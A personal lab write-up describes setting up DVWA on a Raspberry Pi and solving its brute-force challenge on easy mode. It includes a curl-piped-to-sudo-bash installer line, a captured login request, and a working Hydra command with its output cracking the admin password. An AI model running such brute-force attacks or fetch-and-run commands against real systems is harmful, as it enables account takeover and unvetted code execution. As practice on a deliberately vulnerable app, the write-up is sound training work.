2024-12-12 DVWA challenge 1¶
I finally decided that today would be the day I put my RPI to actual use. I decided on hosting my on DVWA (Damn Vulnerable Web Application) to practice some basic web-app pentesting techniques, here’s how it went.
Setup¶
The initial setup of DVWA was fairly typical for any linux application however I had a few painful areas to get through. Originally I decided to clone the DVWA repository to my host machine and copy the file over:
scp -r /home/j/DVWA j@10.x.x.x:/home/j/DVWA
Then ran the following commands to (hopefully) download any dependencies:
sudo apt update
Which instantly failed, after about 30 minutes of debugging I found that adding the us APT mirror fixed the issue, anyways back on topic.
I attempted to start apache but ran into quite a few configuration and PATH issues. Every time I fixed one error another would seemingly appear out of nowhere, at this point I decided that my current setup was beyond repair so I rm -rf’d any apache related directories hoping a fresh install would help.
With my system clean of any previous bugs I decided that the best way to get this working would be to SSH into my rPi and run the setup oneliner they posted on their github:
sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"
This script handled all of the installation perfectly and by running:
sudo apache2
Along with some extra mysql configuration I successfully started DVWA on my rPi and can now access it from my main computer.
Now that I am able to navigate to 10.x.x.x.x:xxxx/DVWA I can start testing the site.
Challenge 1: Brute force¶
Note: This challenge was done on “easy” mode.
Credits: I used This article as a general guide.
The first thing I did for this challenge was open BurpSuite. I wanted to see what requests were being made when I attempted a login, any form of recon like this is essential to create a mind map of a system.
Here is my first test.
I started by running a burpsuite browser proxy and attempted a login with j:j. I copied the request and its response to get a better idea of what’s happening under the hood:
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: 10.0.0.100:8898' -H $'Accept-Language: en-US,en;q=0.9' \
-H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H $'Referer: http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=&password=&Login=Login' \
-H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
-b $'PHPSESSID=6uegn0i91ebjsi55eenm6kkgel; security=low' \
$'http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=j&password=j&Login=Login'
HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:31:38 GMT
Server: Apache/2.4.59 (Raspbian)
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1406
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Breaking this down we can see when we attempt to login it sends an HTTP GET request to my DVWA server passing the username and password as URL parameters, in this case, you can see my username: ?username=j and my password ?password=j.
With this knowledge we can try to perform a brute force by modifying these URL parameters. For this, I will use THC Hydra.
After a few hours of suffering (at least I can say I have experience with hydra now…) I finally managed to successfully brute force the password, here was the final command:
hydra -l admin -P ~/Documents/tools/lists/DVWA-PW-1.txt http-get-form:"//10.x.x.x:xxxx/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:security=low;PHPSESSID=7jnr60dnenvsmqabg1fcemm14h:Username and/or password incorrect" -V
To break this down:
And its output:
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "" - 1 of 22 [child 0] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin" - 2 of 22 [child 1] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "123456" - 3 of 22 [child 2] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "root" - 4 of 22 [child 3] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "toor" - 5 of 22 [child 4] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "guest" - 6 of 22 [child 5] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "user" - 7 of 22 [child 6] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "welcome" - 8 of 22 [child 7] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "qwerty" - 9 of 22 [child 8] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein" - 10 of 22 [child 9] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "monkey" - 11 of 22 [child 10] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin123" - 12 of 22 [child 11] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein123" - 13 of 22 [child 12] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password123" - 14 of 22 [child 13] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin1234" - 15 of 22 [child 14] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "secret" - 16 of 22 [child 15] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "test123" - 17 of 22 [child 0] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "passw0rd" - 18 of 22 [child 1] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "summer" - 19 of 22 [child 2] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "football" - 20 of 22 [child 3] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password1234" - 21 of 22 [child 10] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password" - 22 of 22 [child 5] (0/0)
[8898][http-get-form] host: 10.0.0.100 login: admin password: password
1 of 1 target successfully completed, 1 valid password found
Conclusion¶
Although the setup and debugging was pretty frustrating I really enjoyed this lab when it was complete since I’ve had minimal experience with both brute-forcing and cookie manipulation.